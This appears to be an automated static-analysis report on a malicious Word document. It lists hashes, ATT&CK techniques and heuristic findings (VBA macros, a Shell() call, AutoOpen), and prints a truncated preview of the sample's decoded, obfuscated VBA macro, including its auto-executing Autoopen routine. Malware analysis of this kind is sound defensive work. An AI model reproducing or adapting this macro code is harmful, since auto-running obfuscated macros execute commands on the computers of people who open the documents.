Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f6acb726082ac20…

MALICIOUS

Office (OLE)

Size: 172.5 KB
Created: 2018-04-27 13:28:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: d9482f21b17bd41abbdfbea933303f48
SHA-1: 4febc0601f2af0350b5980b0048671b714c19d57
SHA-256: 6f6acb726082ac203a58c274063873fc0faeabb9d40b6b4af9808ff17cda979d
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a Microsoft Office Word document containing a VBA macro. The critical-severity heuristic indicates a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or to download and run additional payloads. The AutoOpen macro marker further indicates that this code is designed to execute automatically when the document is opened. The script is obfuscated (junk Select Case blocks with random-looking identifiers), which prevents a more detailed static analysis of its specific actions.

Heuristics (5)

  • VBA macros detected (medium; 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call found in VBA code.
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro present.
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 54190 bytes
SHA-256: 06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "RdQYzjkwruGrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AzbzJT(awJKqG)
Select Case FJfMr
         Case 97446
            zWODGi = FHoAlA
            uftoin = Round(65794)
            VtUjS = Hex(BlwrAM - ChrW(cMtDk))
            VqVJE = aKilY
         Case 24792
            CbBVj = CByte(48418)
            mEWrJ = Log(opSSAl)
End Select
End Sub
Sub ZNhzjP(siWzYi)
Select Case JZbrJd
         Case 41159
            QTdATQ = sMlnTl
            tBlUzX = Round(7505)
            XTfvfQ = Hex(aqHYww - ChrW(WjwLH))
            KNlLDT = ZGpjzY
         Case 66519
            KVXlUB = CByte(71755)
            fvpsjf = Log(XmQNX)
End Select
Select Case hUsLk
         Case 32463
            BaaYO = LOYam
            ZTFPOa = Round(98710)
            ERthKL = Hex(dAiZkk - ChrW(tEUQi))
            TnwMd = wqbEi
         Case 70591
            WPjhsN = CByte(5552)
            iNuACE = Log(aBvzw)
End Select
Select Case aRShEm
         Case 25172
            BwAowO = JXcDb
            lZELaU = Round(80163)
            aIjoA = Hex(wQzobp - ChrW(jQtLDq))
            QdSuU = prOVd
         Case 34915
            jaoUA = CByte(95874)
            CtXob = Log(BEILAX)
End Select
End Sub
Sub izzplU(FGCiK)
Select Case SCFcZ
         Case 22205
            XFXFi = iwkjC
            Gophd = Round(96172)
            fzNvqt = Hex(STzzjm - ChrW(QHcbrL))
            mBVXz = EVdVc
         Case 58968
            fIJJjM = CByte(3486)
            OzlCQj = Log(jMFlmO)
End Select
Select Case vrYrkY
         Case 95622
            iXBvII = TufJTX
            kUjcP = Round(77143)
            Pqrbl = Hex(Slpbd - ChrW(XVOBU))
            hjtKG = vVtHDI
         Case 14443
            JaOhJ = CByte(37850)
            viiFD = Log(RzjWTO)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iEXFj
         Case 27257
            QTLhhU = szHhr
            AmFLF = Round(4776)
            dWMlkt = Hex(aFDIz - ChrW(nGbTBY))
            LYCZpb = EwzLA
         Case 63847
            CtHZw = CByte(76641)
            tnuwj = Log(NtKlKh)
End Select
CtEiJlhrij (mFTmw + iPhOuWwc + jziGr)
Select Case QfkMT
         Case 87906
            kRSlI = FfzLlN
            TOiza = Round(39589)
            nHUOjC = Hex(TQdjrr - ChrW(wBTTL))
            qdjmt = ppCAnm
         Case 98275
            RcwEE = CByte(10629)
            mOWitV = Log(WMKiPI)
End Select
End Sub
Sub JaiUnN(RQqtsb)
Select Case UEPOFZ
         Case 8985
            KHAXt = ppIXq
            HBOjQs = Round(72576)
            wjkBt = Hex(BIvPJ - ChrW(hvQaUQ))
            jcahW = wjSpf
         Case 94868
            ojQiW = CByte(97123)
            kRjusN = Log(vMloP)
End Select
Select Case YFsXz
         Case 27483
            vcjSPS = uwilEV
            jOvjoI = Round(90537)
            ThBQw = Hex(iqsfIw - ChrW(IiOiaR))
            zhzjt = oqzrK
         Case 11012
            sIBQz = CByte(42012)
            MHmGv = Log(EbjhB)
End Select
Select Case qjFmi
         Case 34196
            iAstA = Cupzj
            fELAqv = Round(86071)
            WKNKQq = Hex(PVnWTz - ChrW(nGTOlm))
            cObzjW = fjPqp
         Case 56881
            YmicKX = CByte(76014)
            BdNzC = Log(EjcJG)
End Select
End Sub
Sub uvmKjU(jmYfiV)
Select Case OTklbP
         Case 10649
            MzlmT = aCnhii
            dAXwp = Round(67801)
            mdzjc = Hex(Clvqhr - ChrW(rjoYuB))
            Ijlwvn = lSNol
         Case 61175
            QjzCJ = CByte(86508)
            pGwzrs = Log(uMwBo)
End Select
End Sub

Attribute VB_Name = "vCrznpCRSiCvL"
Sub aAoWkI(SdpwE)
Select Case JrGOmw
         Case 85894
            NrAPU = XXYuDf
            nuXcR = Round(62947)
            cZCAju = Hex(aLUPwS - ChrW(NIoGQS))
            vFvvYp = zjlVQ
   
... (truncated)